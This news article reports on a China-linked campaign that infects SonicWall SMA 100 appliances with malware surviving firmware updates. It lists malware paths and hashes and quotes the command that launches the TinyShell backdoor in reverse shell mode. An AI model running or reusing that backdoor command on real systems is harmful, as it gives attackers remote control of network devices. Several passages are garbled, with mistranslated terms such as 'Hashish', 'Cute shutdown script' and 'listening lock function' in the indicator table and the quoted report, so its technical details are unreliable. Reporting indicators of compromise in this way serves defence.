Malware infecting widely used security device survives firmware updates

Threat actors linked to the Chinese government are infecting a widely used security device from SonicWall with malware that remains active even after the device receives firmware updates, researchers said.

SonicWall’s Secure Mobile Access 100 is a secure remote access device that helps organizations securely deploy a remote workforce. Customers use it to grant granular access controls to remote users, provide VPN connections to organizational networks, and define unique profiles for each employee. The access the SMA 100 has to customer networks makes it an attractive target for threat actors.

In 2021, the device was attacked by sophisticated hackers who exploited what was then a zero-day vulnerability. Security appliances from Fortinet and Pulse Secure have come under similar attacks in recent years.

Gaining long-term persistence in networks

On Thursday, security firm Mandiant released a report that said threat actors with suspected ties to China engaged in a campaign to maintain long-term persistence by running malware on unpatched SonicWall SMA appliances. The campaign was notable for the malware’s ability to remain on devices even after downloading new firmware.

“Attackers put significant effort into the stability and persistence of their tools,” wrote Mandiant researchers Daniel Lee, Stephen Eckels and Ben Read. “This allows their access to the network to continue through firmware updates and maintain a position on the network through the SonicWall appliance.”

To achieve this persistence, the malware checks for available firmware updates every 10 seconds. When an update is available, the malware copies the archived backup file, unzips it, attaches it, and then copies the entire malware package into it. The malware also adds a user root backdoor to the attached file. The malware then recompresses the file so that it is ready for installation.

“The technique is not particularly sophisticated, but shows considerable effort on the attacker’s part to understand the device’s update cycle, then develop and test a method for persistence,” the researchers wrote.

The persistence techniques are consistent with a 2021 attack campaign that used 16 malware families to infect Pulse Secure devices. Mandiant attributed the attacks to multiple threat groups, including those tracked as UNC2630, UNC2717, which the company said support “key priorities of the Chinese government.” Mandiant attributed the ongoing attacks against SonicWall SMA 100 clients to a group monitored as UNC4540.

“Over the past few years Chinese attackers have developed multiple exploits and zero-day malware for a variety of networked devices that face the Internet as an avenue for full enterprise intrusion, and the example reported here is part of a recent pattern that Mandiant expects to continue in the short term,” Mandiant researchers wrote in Thursday’s report.

Extremely privileged access

The main purpose of the malware appears to be to steal cryptographically hashed passwords for all logged in users. It also provides a web shell that the threat actor can use to install new malware.

“Analysis of a compromised device revealed a collection of files that provide the attacker with highly privileged and available access to the device,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the bash suite shows a detailed understanding of the device and is well-tuned to the system to provide stability and persistence.”

The list of malware is:

Path Hashish Mode
/bin/firewalld e4117b17e3d14fe64f45750be71dbaa6 Malware main process
/bin/httpsd 2d57bcb8351cf2b57c4fd2d1bb8f862e TinyShell back door
/etc/rc.d/rc.local 559b9ae2a578e1258e80c45a5794c071 Startup persistence for firewall
/bin/iptabled 8dbf1effa7bc94fc0b9b4ce83dfce2e6 Unnecessary malware main process
/bin/geoBotnetd 619769d3d40a3c28ec83832ca521f521 Firmware backdoor script
/bin/ifconfig6 fa1bf2e427b2defffd573854c35d4919 Cute shutdown script

The report continued:

The primary malware entry point is a bash script named firewalldwhich executes its main loop once to count each file in the system in the square: …for j in $(ls / -R) do for i in $(ls / -R) do:… The script is responsible for executing a SQL statement to complete the credential theft and execute the other components.

The first function in firewalld runs the TinyShell backdoor httpsd ordered nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & if the httpsd the process is not already running. This puts TinyShell into reverse shell mode, instructing it to call the aforementioned IP address and port at a specific time and day represented by -m flag, with a beacon interval defined by -d flag. The binary embeds a hardcoded IP address, which is used in reverse shell mode if the IP address argument is left blank. It also has a listening lock function available.

The researchers said they did not know who the original source of infection was.

Last week, SonicWall published an advisory urging SMA 100 users to upgrade to version 10.2.1.7 or later. These versions include improvements such as file integrity monitoring and abnormal process detection. The patch is available here. Users should also regularly review logs for signs of compromise, including abnormal connections or internal traffic.

Leave a Reply

Your email address will not be published. Required fields are marked *